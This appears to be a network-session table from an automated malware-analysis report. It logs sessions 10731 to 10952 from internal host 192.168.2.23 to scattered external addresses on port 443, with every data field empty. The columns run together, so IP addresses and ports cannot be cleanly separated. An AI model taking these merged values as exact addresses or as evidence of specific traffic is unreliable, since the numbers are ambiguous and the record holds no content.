                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10731192.168.2.2359876175.123.27.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10732192.168.2.2343546140.209.78.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10733192.168.2.233900299.47.72.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10734192.168.2.235997073.157.110.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10735192.168.2.235805086.243.207.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10736192.168.2.23422808.65.27.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10737192.168.2.235072853.134.51.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10738192.168.2.2358668191.184.205.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10739192.168.2.2355466222.8.17.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10740192.168.2.2358184129.144.204.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10741192.168.2.234661869.3.175.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10742192.168.2.234285031.191.141.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10743192.168.2.2357518194.96.188.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10744192.168.2.2352686173.73.165.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10745192.168.2.2336726107.234.85.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10746192.168.2.2351580159.63.203.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10747192.168.2.2358764196.56.13.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10748192.168.2.2350568223.139.111.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10749192.168.2.2351852176.56.58.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10750192.168.2.2351026133.61.173.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10751192.168.2.2346888158.164.3.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10752192.168.2.234791662.138.67.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10753192.168.2.233470640.118.156.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10754192.168.2.2348620131.77.15.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10755192.168.2.2345746140.104.226.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10756192.168.2.2346760113.201.241.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10757192.168.2.234011612.253.42.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10758192.168.2.2341740194.17.171.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10759192.168.2.233816217.248.52.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10760192.168.2.233743647.143.194.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10761192.168.2.2359448124.64.20.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10762192.168.2.2360846131.198.127.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10763192.168.2.2346982207.113.135.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10764192.168.2.2343796103.156.65.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10765192.168.2.2345646126.125.43.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10766192.168.2.234349890.151.178.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10767192.168.2.234201231.87.226.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10768192.168.2.234179678.104.138.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10769192.168.2.2355078201.230.148.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10770192.168.2.235557487.224.71.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10771192.168.2.2353108222.121.107.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10772192.168.2.233941494.229.21.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10773192.168.2.23428169.199.127.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10774192.168.2.234172879.249.184.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10775192.168.2.234991061.227.86.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10776192.168.2.2336784130.120.174.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10777192.168.2.2359232162.170.137.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10778192.168.2.2348122151.152.145.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10779192.168.2.235547636.45.33.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10780192.168.2.2351062208.92.58.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10781192.168.2.2351472208.50.198.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10782192.168.2.2358230112.201.215.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10783192.168.2.235740858.174.83.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10784192.168.2.234851844.89.142.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10785192.168.2.2360488177.63.97.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10786192.168.2.2348718159.211.175.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10787192.168.2.234003072.6.8.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10788192.168.2.2342480129.13.141.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10789192.168.2.235694682.198.49.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10790192.168.2.236054475.46.28.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10791192.168.2.234222458.77.105.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10792192.168.2.233420899.80.246.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10793192.168.2.233920649.223.125.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10794192.168.2.234013634.226.35.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10795192.168.2.2337796118.229.65.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10796192.168.2.235744865.80.28.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10797192.168.2.2360372160.62.58.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10798192.168.2.235157265.137.53.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10799192.168.2.235190247.201.252.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10800192.168.2.234384468.63.176.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10801192.168.2.2356118114.59.132.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10802192.168.2.2346842136.128.148.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10803192.168.2.2358486128.32.201.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10804192.168.2.2354920112.225.174.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10805192.168.2.2348792206.109.163.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10806192.168.2.2359966119.14.160.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10807192.168.2.235455064.36.98.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10808192.168.2.2352726179.6.210.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10809192.168.2.2349084213.216.40.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10810192.168.2.2339796180.231.62.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10811192.168.2.2347884145.210.6.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10812192.168.2.2348590164.160.170.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10813192.168.2.234809645.142.178.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10814192.168.2.235922880.226.143.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10815192.168.2.234069674.112.188.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10816192.168.2.235626275.92.228.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10817192.168.2.2347878198.150.108.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10818192.168.2.2339838120.229.47.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10819192.168.2.234216676.83.163.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10820192.168.2.2355920218.81.110.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10821192.168.2.235782257.213.15.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10822192.168.2.235888014.187.105.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10823192.168.2.234767678.159.211.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10824192.168.2.233810482.150.112.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10825192.168.2.2350436113.160.12.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10826192.168.2.2355268160.230.93.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10827192.168.2.2348426158.151.128.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10828192.168.2.2350902100.173.50.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10829192.168.2.2342130160.221.156.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10830192.168.2.2347430199.214.0.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10831192.168.2.2335784133.111.126.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10832192.168.2.2336900134.154.248.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10833192.168.2.234747095.160.17.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10834192.168.2.2340580116.148.40.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10835192.168.2.2351970210.192.112.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10836192.168.2.2340394202.62.133.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10837192.168.2.234083613.170.234.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10838192.168.2.2334382211.244.55.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10839192.168.2.233721881.28.122.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10840192.168.2.2334680201.145.8.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10841192.168.2.234136424.176.33.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10842192.168.2.2349340153.58.217.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10843192.168.2.2346180205.118.150.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10844192.168.2.2346150153.132.57.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10845192.168.2.2340764193.92.176.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10846192.168.2.235230825.74.216.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10847192.168.2.23486165.84.53.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10848192.168.2.2356834156.235.110.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10849192.168.2.2348364107.44.246.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10850192.168.2.2341654101.11.237.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10851192.168.2.236074278.231.139.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10852192.168.2.2356400115.175.42.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10853192.168.2.2346816218.50.20.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10854192.168.2.235200075.39.8.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10855192.168.2.23585342.172.169.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10856192.168.2.235529420.55.104.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10857192.168.2.2344432109.49.188.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10858192.168.2.233923618.89.190.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10859192.168.2.233480877.219.28.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10860192.168.2.2347766219.72.203.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10861192.168.2.2350612173.214.188.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10862192.168.2.2356260202.166.166.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10863192.168.2.234861039.208.174.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10864192.168.2.2358224177.44.252.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10865192.168.2.2355456158.194.59.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10866192.168.2.2355196220.144.54.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10867192.168.2.234787035.127.253.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10868192.168.2.2343830134.118.158.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10869192.168.2.2355662170.115.61.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10870192.168.2.235344234.132.141.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10871192.168.2.235570043.223.139.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10872192.168.2.235164646.199.236.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10873192.168.2.2332842143.34.170.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10874192.168.2.235356013.123.97.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10875192.168.2.23447384.200.38.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10876192.168.2.235569020.199.1.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10877192.168.2.2355706133.78.252.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10878192.168.2.2358260221.208.208.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10879192.168.2.233758848.135.222.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10880192.168.2.2359496117.183.144.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10881192.168.2.2346174132.61.180.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10882192.168.2.2345000208.179.100.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10883192.168.2.2347182148.9.134.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10884192.168.2.2341600167.80.99.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10885192.168.2.2350530209.189.108.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10886192.168.2.234892617.74.183.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10887192.168.2.2350540144.253.200.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10888192.168.2.233961236.138.91.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10889192.168.2.233992844.108.95.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10890192.168.2.234636850.55.132.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10891192.168.2.2350454140.120.90.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10892192.168.2.2333012159.212.89.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10893192.168.2.233521268.42.128.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10894192.168.2.2354564211.121.188.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10895192.168.2.2355352152.239.85.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10896192.168.2.2349510136.157.244.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10897192.168.2.2337924151.153.216.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10898192.168.2.2341092200.24.136.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10899192.168.2.2357498168.208.13.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10900192.168.2.235777067.34.147.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10901192.168.2.2335454145.249.204.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10902192.168.2.235518861.66.45.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10903192.168.2.233658458.119.161.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10904192.168.2.2339718146.170.48.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10905192.168.2.234287859.212.179.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10906192.168.2.235561293.105.7.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10907192.168.2.2351728158.41.189.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10908192.168.2.2341916193.138.139.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10909192.168.2.2352332172.185.96.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10910192.168.2.2338546160.207.111.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10911192.168.2.235801091.164.151.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10912192.168.2.235602419.136.170.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10913192.168.2.2348358114.109.225.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10914192.168.2.235325436.220.221.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10915192.168.2.2334574134.202.70.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10916192.168.2.2358300199.153.101.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10917192.168.2.2355848221.168.97.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10918192.168.2.2340878150.190.100.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10919192.168.2.233638659.230.38.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10920192.168.2.2342504173.190.184.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10921192.168.2.2340870147.178.120.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10922192.168.2.2341496155.142.226.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10923192.168.2.233881895.197.89.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10924192.168.2.2346582219.245.163.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10925192.168.2.2347678117.187.127.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10926192.168.2.235102027.40.156.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10927192.168.2.2343506109.49.172.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10928192.168.2.2352910115.118.18.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10929192.168.2.2359742192.17.44.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10930192.168.2.2344832170.231.223.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10931192.168.2.235759440.193.87.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10932192.168.2.235176263.240.175.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10933192.168.2.2335852221.193.226.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10934192.168.2.2346614138.164.73.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10935192.168.2.2360000163.75.61.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10936192.168.2.2342830172.132.76.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10937192.168.2.2348024207.30.115.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10938192.168.2.234088452.100.61.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10939192.168.2.2354482193.224.0.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10940192.168.2.2340164211.188.25.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10941192.168.2.2358794128.180.144.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10942192.168.2.235313895.167.216.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10943192.168.2.2351436155.76.18.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10944192.168.2.2345096169.74.221.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10945192.168.2.2338042188.192.224.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10946192.168.2.2357058180.31.21.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10947192.168.2.2354992205.9.60.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10948192.168.2.2342110126.30.96.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10949192.168.2.235877624.19.119.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10950192.168.2.235412846.31.62.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10951192.168.2.2340132128.62.161.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10952192.168.2.235630218.202.6.114443
